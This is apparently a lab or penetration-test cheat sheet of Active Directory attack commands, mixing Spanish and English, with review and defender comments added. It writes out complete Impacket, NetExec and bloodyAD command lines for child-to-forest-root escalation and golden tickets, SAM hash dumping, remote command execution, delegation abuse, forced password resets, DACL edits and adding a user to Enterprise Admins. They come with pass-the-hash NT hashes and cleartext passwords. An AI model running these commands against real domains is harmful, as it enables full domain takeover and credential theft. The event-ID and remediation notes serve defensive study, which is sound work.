https://queries.specterops.io/

Impacket
# Impacket raiseChild.py: child-domain-to-forest-root escalation.
# Authenticates as OPS.COMPLY.COM/pete with an NT hash (-hashes with an empty LM half)
# and, through -target-exec, asks for command execution on 172.16.173.160 once the
# escalation has finished.
# NOTE(review): the tool needs domain-admin-level rights in the child domain;
# presumably pete holds them here. Confirm against the engagement notes.
# NOTE(review): the NT hash is kept in clear in these notes and passed in argv, so it
# also lands in shell history and process listings; redact before sharing the page.
# Defender view: trusts inside one forest are not a security boundary, so a child-domain
# admin compromise has to be handled as a forest compromise (rotate the child krbtgt key
# twice). The tool is documented as pulling krbtgt material over directory replication;
# replication requests from a non-DC host (event 4662 with the replication rights) and
# service tickets carrying a parent-domain privileged SID are the signals to alert on.
python3 /usr/share/doc/python3-impacket/examples/raiseChild.py -target-exec 172.16.173.160 OPS.COMPLY.COM/pete -hashes :6db6cfdf45964a02a80e85a7ab9f4314

NXC
Desde NetExec, tenemos que utilizar el módulo raisechild contra la máquina a la que tenemos acceso. Así obtenemos un golden ticket del administrador del dominio padre, que podemos utilizar para acceder a todas las máquinas del dominio en cuestión.
# Step 1: run the raisechild module over LDAP against 172.16.238.165 as Pete in
# ops.comply.com, resolving names through 172.16.238.168 (--dns-server).
# NOTE(review): the cleartext password is passed with -p, so it ends up in shell
# history and is visible in process listings; it is also stored in these notes.
nxc ldap 172.16.238.165 -d 'ops.comply.com' -u Pete -p 0998ASDaas2 --dns-server 172.16.238.168 -M raisechild
# Step 2: point Kerberos-aware tools at the credential cache.
# Presumably Administrator.ccache was written by the previous step (confirm); the
# relative path means the following commands must run from the same directory.
# Treat the file as a live domain-admin credential and delete it after use.
export KRB5CCNAME=Administrator.ccache
# Step 3: authenticate with the cached ticket (--use-kcache) and dump the local SAM hashes.
# Defender view: remote SAM extraction by a domain-admin identity from a workstation
# that is not an admin host is worth alerting on.
nxc smb 172.16.238.165 --use-kcache --sam
# Step 4: remote command execution (-x) with the same ticket, reading the proof file
# on two hosts (.165 and .160) as evidence of access.
# Defender view: after this chain the child krbtgt key must be rotated twice; a forged
# ticket stays usable until that is done, whatever password resets are performed.
nxc smb 172.16.238.165 --use-kcache -x "type \\users\\administrator\\desktop\\proof.txt"
nxc smb 172.16.238.160 --use-kcache -x "type \\users\\administrator\\desktop\\proof.txt"


# Delegation abuse: with the NT hash of the machine account DENKIAIR/APP01$, request a
# service ticket for cifs/FILE02.DENKIAIR.COM on behalf of Administrator (-impersonate).
# -altservice 'cifs' names the same service class as the SPN, so it looks redundant
# here. TODO confirm.
# NOTE(review): this only works if APP01$ is allowed to delegate to that SPN; the
# delegation configuration is not shown on this page.
# Defender view: put privileged accounts in Protected Users or mark them "Account is
# sensitive and cannot be delegated", and review which computer accounts carry
# delegation rights. Ticket requests show up as event 4769 on the DC (172.16.180.101).
impacket-getST -spn 'cifs/FILE02.DENKIAIR.COM' -impersonate 'Administrator' -altservice 'cifs' -hashes :b6504636e6f1f89f9a15929c2de34aa8 -dc-ip 172.16.180.101 'DENKIAIR/APP01$'
# The next two commands do the same thing with different tools: as adminWebSvc
# (pass-the-hash), reset the password of user nina in final.com to a known value.
# NOTE(review): this presumes adminWebSvc holds a reset-password right over nina; confirm
# from the ACL analysis. Both the NT hash and the new password are in clear in argv.
# Defender view: a reset performed by a service account is logged as event 4724 on the
# DC; service accounts should not hold password-reset rights on user objects.
nxc smb 172.16.238.180 -u adminWebSvc -H b0df1cb0819ca0b7d476d4c868175b94 -d final.com -M change-password -o USER=nina NEWPASS='Alumne1234.'
bloodyAD --host 172.16.238.180 -d final.com -u adminWebSvc -p :b0df1cb0819ca0b7d476d4c868175b94 set password nina 'Alumne1234.'
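# DACL edit: authenticated as TRICKY.COM/sqlsvc, grant the principal 'SQL ADMINS' the
# WriteMembers right on the group CN=MailAdmins,OU=TGroups,DC=TRICKY,DC=COM.
# Line continuations use a single trailing backslash; a doubled one ends the command
# at the first line and runs the remaining lines as separate commands.
# NOTE(review): the cleartext password is part of the target string in argv, so it is
# exposed in shell history and process listings; it is also stored in these notes.
# Defender view: a DACL change is a persistent modification that outlives the session.
# With directory-service change auditing enabled it is logged as event 5136 on the
# object's nTSecurityDescriptor; the added ACE has to be removed during cleanup.
impacket-dacledit -action write -rights WriteMembers \
-principal 'SQL ADMINS' \
-target-dn 'CN=MailAdmins,OU=TGroups,DC=TRICKY,DC=COM' \
'TRICKY.COM/sqlsvc:4dfgdfFFF542' -dc-ip 172.16.212.150
# Group-membership change: as tina (pass-the-hash) against 172.16.111.180, add tina to
# 'ENTERPRISE ADMINS' in final.com.
# NOTE(review): presumes tina already holds write access to that group's membership;
# the page does not show where that right comes from.
# Defender view: any addition to Enterprise Admins should page someone. It is logged as
# a security-group membership change on the DC (event 4756 for a universal group).
bloodyAD -d final.com -u tina -p :1d4c153225b424290188504b9e0541eb \
--host 172.16.111.180 add groupMember 'ENTERPRISE ADMINS' tina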